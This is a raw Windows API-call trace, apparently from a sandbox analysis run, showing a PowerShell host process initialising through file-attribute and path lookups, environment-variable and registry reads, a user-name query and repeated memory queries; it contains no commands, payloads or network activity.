	[0353.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.344] SetErrorMode (uMode=0x1) returned 0x1
	[0353.344] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.344] CoTaskMemFree (pv=0x1b8a70) 
	[0353.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.351] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.351] SetErrorMode (uMode=0x1) returned 0x1
	[0353.351] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0353.351] SetErrorMode (uMode=0x1) returned 0x1
	[0353.351] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.351] SetErrorMode (uMode=0x1) returned 0x1
	[0353.351] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0353.351] SetErrorMode (uMode=0x1) returned 0x1
	[0353.351] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xad070, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.352] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.352] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.352] SetErrorMode (uMode=0x1) returned 0x1
	[0353.352] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.352] SetErrorMode (uMode=0x1) returned 0x1
	[0353.352] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.352] SetErrorMode (uMode=0x1) returned 0x1
	[0353.352] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.352] SetErrorMode (uMode=0x1) returned 0x1
	[0353.352] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.353] SetErrorMode (uMode=0x1) returned 0x1
	[0353.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.353] SetErrorMode (uMode=0x1) returned 0x1
	[0353.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.353] SetErrorMode (uMode=0x1) returned 0x1
	[0353.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad270 | out: lpFileInformation=0xad270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.353] SetErrorMode (uMode=0x1) returned 0x1
	[0353.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.354] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.354] SetErrorMode (uMode=0x1) returned 0x1
	[0353.354] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.354] SetErrorMode (uMode=0x1) returned 0x1
	[0353.354] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.354] SetErrorMode (uMode=0x1) returned 0x1
	[0353.355] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.355] SetErrorMode (uMode=0x1) returned 0x1
	[0353.355] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xacfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.355] SetErrorMode (uMode=0x1) returned 0x1
	[0353.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.355] SetErrorMode (uMode=0x1) returned 0x1
	[0353.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.355] SetErrorMode (uMode=0x1) returned 0x1
	[0353.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad2b0 | out: lpFileInformation=0xad2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.356] SetErrorMode (uMode=0x1) returned 0x1
	[0353.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xacfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xad310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.358] SetErrorMode (uMode=0x1) returned 0x1
	[0353.358] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xad570 | out: lpFileInformation=0xad570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.358] SetErrorMode (uMode=0x1) returned 0x1
	[0353.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.777] CoTaskMemAlloc (cb=0x804) returned 0x1b8ae300
	[0353.777] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ae300, nSize=0xad8d8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad8d8) returned 0x1
	[0353.778] CoTaskMemFree (pv=0x1b8ae300) 
	[0353.778] CoTaskMemAlloc (cb=0x204) returned 0x202920
	[0353.778] GetUserNameW (in: lpBuffer=0x202920, pcbBuffer=0xad918 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad918) returned 1
	[0353.778] CoTaskMemFree (pv=0x202920) 
	[0353.779] ReportEventW (hEventLog=0x1b990008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3028088*="Available", lpRawData=0x3027e18) returned 1
	[0353.897] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.897] CoTaskMemFree (pv=0x1b8a70) 
	[0353.897] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.897] CoTaskMemFree (pv=0x1b8a70) 
	[0353.899] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.899] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0353.899] CoTaskMemFree (pv=0x1b8a70) 
	[0353.899] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.899] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0353.899] CoTaskMemFree (pv=0x1b8a70) 
	[0353.900] GetCurrentProcessId () returned 0x97c
	[0353.901] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad8f8 | out: phkResult=0xad8f8*=0x364) returned 0x0
	[0353.901] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad87c, lpData=0x0, lpcbData=0xad878*=0x0 | out: lpType=0xad87c*=0x1, lpData=0x0, lpcbData=0xad878*=0x56) returned 0x0
	[0353.901] CoTaskMemAlloc (cb=0x5a) returned 0x2136e0
	[0353.901] RegQueryValueExW (in: hKey=0x364, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad84c, lpData=0x2136e0, lpcbData=0xad848*=0x56 | out: lpType=0xad84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad848*=0x56) returned 0x0
	[0353.901] CoTaskMemFree (pv=0x2136e0) 
	[0353.901] RegCloseKey (hKey=0x364) returned 0x0
	[0353.902] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.902] CoTaskMemFree (pv=0x1b8a70) 
	[0353.928] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.928] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.928] CoTaskMemFree (pv=0x1b8a70) 
	[0353.930] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.933] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.933] CoTaskMemFree (pv=0x1b8a70) 
	[0353.934] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.934] CoTaskMemFree (pv=0x1b8a70) 
	[0353.934] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.934] CoTaskMemFree (pv=0x1b8a70) 
	[0353.935] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0353.935] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.935] CoTaskMemFree (pv=0x1b8a70) 
	[0354.107] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0354.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.107] CoTaskMemFree (pv=0x1b8a70) 
	[0354.107] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0354.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.107] CoTaskMemFree (pv=0x1b8a70) 
	[0354.108] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.113] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.318] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.333] CoTaskMemAlloc (cb=0x104) returned 0x1b8a70
	[0354.333] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8a70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.333] CoTaskMemFree (pv=0x1b8a70) 
	[0354.507] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8eb0
	[0354.509] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b8fc0
	[0354.664] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.847] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.850] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.850] VirtualQuery (in: lpAddress=0xaa3a0, lpBuffer=0xab260, dwLength=0x30 | out: lpBuffer=0xab260*(BaseAddress=0xaa000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.029] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.029] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.029] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.029] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.030] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0355.031] VirtualQuery (in: lpAddress=0xab950, lpBuffer=0xac810, dwLength=0x30 | out: lpBuffer=0xac810*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
